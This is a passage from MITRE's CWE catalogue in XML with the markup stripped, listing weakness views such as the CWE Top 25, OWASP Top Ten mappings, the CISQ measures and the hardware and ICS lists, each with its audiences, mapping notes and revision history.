search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2019-01-08 + 3.3 + 2019-06-20 + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view organizes weaknesses around concepts that are frequently used or encountered in hardware design. Accordingly, this view can align closely with the perspectives of designers, manufacturers, educators, and assessment vendors. It provides a variety of categories that are intended to simplify navigation, browsing, and mapping. + + + Hardware Designers + Hardware Designers use this view to better understand potential mistakes that can be made in specific areas of their IP design. The use of concepts with which hardware designers are familiar makes it easier to navigate. + + + Educators + Educators use this view to teach future professionals about the types of mistakes that are commonly made in hardware design. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The top level categories in this view represent commonly understood areas/terms within hardware design, and are meant to aid the user in identifying potential related weaknesses. It is possible for the same weakness to exist within multiple different categories. + This view attempts to present weaknesses in a simple and intuitive way. As such it targets a single level of abstraction. It is important to realize that not every CWE will be represented in this view. High-level class weaknesses and low-level variant weaknesses are mostly ignored. However, by exploring the weaknesses that are included, and following the defined relationships, one can find these higher and lower level weaknesses. + + + + CWE Content Team + MITRE + 2019-12-27 + 4.0 + 2020-02-24 + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2019 CWE Top 25 Most Dangerous Software Errors. + + + Software Developers + By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + If a software developer claims to be following the Top 25, then customers can use the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2019-09-18 + 3.4 + 2019-09-19 + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view outlines the most important software quality issues as identified by the Consortium for Information & Software Quality (CISQ) Automated Quality Characteristic Measures, released in 2020. These measures are derived from Object Management Group (OMG) standards. + + + Software Developers + This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. + + + Product Vendors + This view can help product vendors understand code quality issues and convey an overall status of their software. + + + Assessment Tool Vendors + This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2020-08-18 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2021 CWE Top 25 Most Dangerous Software Weaknesses. + + + Software Developers + By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. + + + Educators + Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2021-06-22 + 4.5 + 2021-07-20 + + + CWE Content Team + MITRE + 2021-10-28 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view outlines the SMM representation of the Automated Source Code Data Protection Measurement specifications, as identified by the Consortium for Information & Software Quality (CISQ) Working Group. + + + Software Developers + This view provides a good starting point for anyone involved in software development (including architects, designers, coders, and testers) to ensure that code quality issues are considered during the development process. + + + Product Vendors + This view can help product vendors understand code quality issues and convey an overall status of their software. + + + Assessment Tool Vendors + This view provides a good starting point for assessment tool vendors (e.g., vendors selling static analysis tools) who wish to understand what constitutes software with good code quality, and which quality issues may be of concern. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2020-12-10 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2021 CWE Most Important Hardware Weaknesses List, as determined by the Hardware CWE Special Interest Group (HW CWE SIG). + + + Hardware Designers + By following this list, hardware designers and implementers are able to significantly reduce the number of weaknesses that occur in their products. + + + Product Customers + Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. + + + Educators + Educators can use this view to focus curriculum on the most important hardware weaknesses. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2021-09-29 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are associated with the OWASP Top Ten, as released in 2021. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2021 version), providing a good starting point for web application developers who want to code more securely. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten (2021 version), providing product customers with a way of asking their software development teams to follow minimum expectations for secure code. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + As of CWE 4.6, the relationships in this view were pulled directly from the CWE mappings cited in the 2021 OWASP Top Ten. These mappings include categories and high-level weaknesses. One mapping to a deprecated entry was removed. The CWE Program will work with OWASP to improve these mappings, possibly requiring modifications to CWE itself. + + + + CWE Content Team + MITRE + 2021-10-05 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2020 CWE Top 25 Most Dangerous Software Weaknesses. + + + Software Developers + By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. + + + Educators + Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2020-08-20 + 4.2 + 2020-08-20 + + + CWE Content Team + MITRE + 2021-10-28 + updated View_Audience + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are associated with the Categories of Security Vulnerabilities in ICS, as published by the Securing Energy Infrastructure Executive Task Force (SEI ETF) in March 2022. Weaknesses and categories in this view are focused on issues that affect ICS (Industrial Control Systems) but have not been traditionally covered by CWE in the past due to its earlier emphasis on enterprise IT software. Note: weaknesses in this view are based on "Nearest IT Neighbor" recommendations and other suggestions by the CWE team. These relationships are likely to change in future CWE versions. + + + Hardware Designers + ICS/OT hardware designers can use this view to ensure a minimal set of weaknesses that should be avoided or mitigated during the design process. + + + Product Vendors + Product vendors can use this view to ensure that all aspects of the product lifecycle address these weaknesses. + + + Assessment Tool Vendors + Assessment tool vendors that help to assess potential weaknesses, or avoid them, can use this view to improve their tool's coverage to address more weaknesses. + + + Academic Researchers + Academic researchers can use this view to identify potential research opportunities that could produce better methods for detection or avoidance of weaknesses in ICS/OT products. + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + Relationships in this view are not authoritative and subject to change. See Maintenance notes. + This view was created in CWE 4.7 to facilitate and illuminate discussion about weaknesses in ICS with [REF-1248] as a starting point. After the release of CWE 4.9 in October 2022, this has been under active review by members of the "Boosting CWE" subgroup of the CWE-CAPEC ICS/OT Special Interest Group (SIG). Relationships are still subject to change. In addition, there may be some issues in [REF-1248] that are outside of the current scope of CWE, which will require consultation with many CWE stakeholders to resolve. + + + + New Categories of Security Vulnerabilities (NCSV) Technical Project Team (TPT) + Securing Energy Infrastructure Executive Task Force + 2022-03-09 + 4.7 + 2022-04-28 + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2022 CWE Top 25 Most Dangerous Software Weaknesses. + + + Software Developers + By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. + + + Educators + Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2022-06-22 + 4.8 + 2022-06-28 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + + This view organizes weaknesses around categories that are of interest to large-scale software assurance research to support the elimination of weaknesses using tactics such as secure language development. It is also intended to help tracking weakness trends in publicly disclosed vulnerability data. This view is comprehensive in that every weakness must be contained in it, unlike most other views that only use a subset of weaknesses. This view is structured with categories at the top level, with a second level of only weaknesses. Relationships among the weaknesses presented under the research view (CWE-1000) are not shown. + Each weakness is added to only one category. All categories are mutually exclusive; that is, no weakness can be a member of more than one category. While weaknesses defy strict categorization along only one characteristic, the forced bucketing into a single category can simplify certain kinds of analysis. + Note that the size of each category can vary widely because (1) CWE is not as well fleshed-out in some areas compared to others; (2) abstraction of the CWEs in the grouping might go down to Variant level for some buckets, versus others. + + + + Academic Researchers + Researchers can use this view to evaluate the breadth and depth of software assurance with respect to mitigating and managing weaknesses before they become vulnerabilities. + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + This view is different than the software development view (CWE-699) because this view is expected to include all weaknesses regardless of abstraction, while view 699 uses a largely-fixed Base level of abstraction related only to software weaknesses. It is different from the Research view (CWE-1000) because while comprehensive for all weaknesses, the view uses a deep hierarchical structure and excludes categories. + + + + CWE Content Team + MITRE + 2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view are listed in the 2023 CWE Top 25 Most Dangerous Software Weaknesses. + + + Software Developers + By following the CWE Top 25, developers are able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + Customers can use the weaknesses in this view in order to formulate independent evidence of a claim by a product vendor to have eliminated / mitigated the most dangerous weaknesses. + + + Educators + Educators can use this view to focus curriculum and teachings on the most dangerous weaknesses. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2023-06-26 + 4.12 + 2023-06-29 + + + + + This view (slice) covers all the elements in CWE. + /Weakness_Catalog/*[not(self::External_References)]/* + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-01-30 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE nodes in this view (slice) have been deprecated. There should be a reference pointing to the replacement in each deprecated weakness. + /Weakness_Catalog/*/*[@Status='Deprecated'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2007-05-07 + Draft 6 + 2007-05-07 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, View_Structure + + + CWE Content Team + MITRE + 2008-11-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-08-28 + changed explicit member list to implicit filter + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Deprecated + + + + CWE nodes in this view (graph) are associated with the OWASP Top Ten, as released in 2007. This view is considered obsolete as a newer version of the OWASP Top Ten is available. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2007 version), providing a good starting point for web application developers who want to code more securely. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten (2007 version), providing customers with a way of asking their software developers to follow minimum expectations for secure code. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view are a direct extraction of the CWE mappings that are in the 2007 OWASP document. CWE has changed since the release of that document. + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, Relationships, References, Relationship_Notes, View_Audience, View_Structure + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2023-04-27 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses in OWASP Top Ten + + + + This view has been deprecated. It was only used for an early year of the NIST SAMATE project, and it did not represent any official or commonly-utilized list. + + Prohibited + This CWE has been deprecated. It is also a View. + N/A + + + + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, References, View_Structure + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, References, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses Examined by SAMATE + + + + This view has been deprecated because it is not actively maintained and does not provide utility to stakeholders. It was originally created before CWE 1.0 as a simple example of how views could be structured within CWE. + + Prohibited + This CWE has been deprecated. It is also a View. + N/A + + + + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, View_Structure + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Resource-specific Weaknesses + + + + CWE nodes in this view (slice) were used by NIST to categorize vulnerabilities within NVD, from 2008 to 2016. This original version has been used by many other projects. + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + In Summer 2007, NIST began using this set of CWE elements to classify CVE entries within the National Vulnerability Database (NVD). The data was made publicly available beginning in 2008. In 2016, NIST began using a different list as derived from the "Weaknesses for Simplified Mapping of Published Vulnerabilities" view (CWE-1003). + + + + + CWE Content Team + MITRE + 2007-10-01 + Draft 7 + 2007-10-01 + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, References, View_Structure + + + CWE Content Team + MITRE + 2017-01-19 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name + + + CWE Content Team + MITRE + 2021-03-15 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses Used by NVD + + + + This view (slice) covers issues that are found in C programs that are not common to all languages. + /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='C'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses found in the C Language + + + + This view (slice) covers issues that are found in C++ programs that are not common to all languages. + /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='C++'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses found in the C++ Language + + + + This view (slice) covers issues that are found in Java programs that are not common to all languages. + /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='Java'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses found in the Java Language + + + + This view (slice) covers issues that are found in PHP programs that are not common to all languages. + /Weakness_Catalog/Weaknesses/Weakness[./Applicable_Platforms/Language/@Name='PHP'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Name, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses found in the PHP Language + + + + This view (slice) displays only weakness base elements. + /Weakness_Catalog/Weaknesses/Weakness[@Abstraction='Base'][not(@Status='Deprecated')] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated View_Filter, View_Structure + + + CWE Content Team + MITRE + 2019-01-03 + updated View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view displays only composite weaknesses. + /Weakness_Catalog/Weaknesses/Weakness[@Structure='Composite'][not(@Status='Deprecated')] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, View_Filter, View_Structure + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, View_Structure + + + CWE Content Team + MITRE + 2019-01-03 + updated View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view has been deprecated. It has limited utility for stakeholders, since all weaknesses can be links in a chain. + /Weakness_Catalog[false()] + + Prohibited + This CWE has been deprecated. It is also a View. + N/A + + + + + + + CWE Content Team + MITRE + 2008-04-11 + Draft 9 + 2008-04-11 + + + CWE Content Team + MITRE + 2008-09-08 + updated View_Filter, View_Structure + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Type, View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Chain Elements + + + + This view organizes weaknesses around concepts that are frequently used or encountered in software development. This includes all aspects of the software development lifecycle including both architecture and implementation. Accordingly, this view can align closely with the perspectives of architects, developers, educators, and assessment vendors. It provides a variety of categories that are intended to simplify navigation, browsing, and mapping. + + + Software Developers + Software developers (including architects, designers, coders, and testers) use this view to better understand potential mistakes that can be made in specific areas of their software application. The use of concepts that developers are familiar with makes it easier to navigate this view, and filtering by Modes of Introduction can enable focus on a specific phase of the development lifecycle. + + + Educators + Educators use this view to teach future developers about the types of mistakes that are commonly made within specific parts of a codebase. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The top level categories in this view represent commonly understood areas/terms within software development, and are meant to aid the user in identifying potential related weaknesses. It is possible for the same weakness to exist within multiple different categories. + This view attempts to present weaknesses in a simple and intuitive way. As such it targets a single level of abstraction. It is important to realize that not every CWE will be represented in this view. High-level class weaknesses and low-level variant weaknesses are mostly ignored. However, by exploring the weaknesses that are included, and following the defined relationships, one can find these higher and lower level weaknesses. + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Description, View_Audience + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Other_Notes, Relationships, View_Audience + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Development Concepts + + + + This view (graph) organizes weaknesses using a hierarchical structure that is similar to that used by Seven Pernicious Kingdoms. + + + Software Developers + This view is useful for developers because it is organized around concepts with which developers are familiar, and it focuses on weaknesses that can be detected using source code analysis tools. + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The MITRE CWE team frequently uses "7PK" as an abbreviation for Seven Pernicious Kingdoms. + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2017-05-03 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Alternate_Terms, Other_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view (slice) lists weaknesses that can be introduced during design. + /Weakness_Catalog/Weaknesses/Weakness[(@Abstraction='Base') or (@Abstraction='Class')][./Modes_Of_Introduction/Introduction/Phase='Architecture and Design'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-02-10 + Critical + Updated the View_Filter to reflect new structure in CWE Schema v4.2 + + + CWE Content Team + MITRE + 2009-03-10 + updated View_Filter + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated View_Filter + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view (slice) lists weaknesses that can be introduced during implementation. + /Weakness_Catalog/Weaknesses/Weakness[./Modes_Of_Introduction/Introduction/Phase='Implementation'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2009-02-10 + Critical + Updated the View_Filter to reflect new structure in CWE Schema v4.2 + + + CWE Content Team + MITRE + 2009-03-10 + updated View_Filter + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This view displays Named Chains and their components. + /Weakness_Catalog/Weaknesses/Weakness[@Structure='Chain'] + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + + CWE Content Team + MITRE + 2008-09-09 + 1.0 + 2008-09-09 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, View_Structure + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are associated with the OWASP Top Ten, as released in 2004, and as required for compliance with PCI DSS version 1.1. This view is considered obsolete as a newer version of the OWASP Top Ten is available. + + + Software Developers + This view outlines the most important issues as identified by the OWASP Top Ten (2004 version), providing a good starting point for web application developers who want to code more securely, as well as complying with PCI DSS 1.1. + + + Product Customers + This view outlines the most important issues as identified by the OWASP Top Ten, providing customers with a way of asking their software developers to follow minimum expectations for secure code, in compliance with PCI-DSS 1.1. + + + Educators + Since the OWASP Top Ten covers the most frequently encountered issues, this view can be used by educators as training material for students. However, the 2007 version (CWE-629) might be more appropriate. + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + CWE relationships for this view were obtained by examining the OWASP document and mapping to any items that were specifically mentioned within the text of a category. As a result, this mapping is not complete with respect to all of CWE. In addition, some concepts were mentioned in multiple Top Ten items, which caused them to be mapped to multiple CWE categories. For example, SQL injection is mentioned in both A1 (CWE-722) and A6 (CWE-727) categories. + As of 2008, some parts of CWE were not fully clarified out in terms of weaknesses. When these areas were mentioned in the OWASP Top Ten, category entries were mapped, although general mapping practice would usually favor mapping only to weaknesses. + + + + Veracode + 2008-08-15 + 1.0 + 2008-09-09 + Suggested creation of view and provided mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Maintenance_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + CWE entries in this view (graph) are fully or partially eliminated by following the guidance presented in the book "The CERT C Secure Coding Standard" published in 2008. This view is considered obsolete, as a newer version of the coding standard is available. This view statically represents the coding rules as they were in 2008. + + + Software Developers + By following the CERT C Secure Coding Standard, developers will be able to fully or partially prevent the weaknesses that are identified in this view. In addition, developers can use a CWE coverage graph to determine which weaknesses are not directly addressed by the standard, which will help identify and resolve remaining gaps in training, tool acquisition, or other approaches for reducing weaknesses. + + + Product Customers + If a software developer claims to be following the CERT C Secure Coding standard, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could link them to the relevant Secure Coding Standard. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate weakness. + + + + + + The relationships in this view were determined based on specific statements within the rules from the standard. Not all rules have direct relationships to individual weaknesses, although they likely have chaining relationships in specific circumstances. + + + + CWE Content Team + MITRE + 2008-11-24 + 1.1 + 2008-11-24 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, References + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Name, References + + + CWE Content Team + MITRE + 2020-02-24 + updated View_Audience + + + CWE Content Team + MITRE + 2021-03-15 + updated Description, Maintenance_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Weaknesses Addressed by the CERT C Secure Coding Standard + Weaknesses Addressed by the CERT C Secure Coding Standard (2008 Version) + + + + CWE entries in this view (graph) are listed in the 2009 CWE/SANS Top 25 Programming Errors. This view is considered obsolete as a newer version of the Top 25 is available. + + + Software Developers + By following the Top 25, developers will be able to significantly reduce the number of weaknesses that occur in their software. + + + Product Customers + If a software developer claims to be following the Top 25, then customers can search for the weaknesses in this view in order to formulate independent evidence of that claim. + + + Educators + Educators can use this view in multiple ways. For example, if there is a focus on teaching weaknesses, the educator could focus on the Top 25. + + + + + + + + + + + + Prohibited + This entry is a View. Views are not weaknesses and therefore inappropriate to describe the root causes of vulnerabilities. + Use this View or other Views to search and navigate for the appropriate 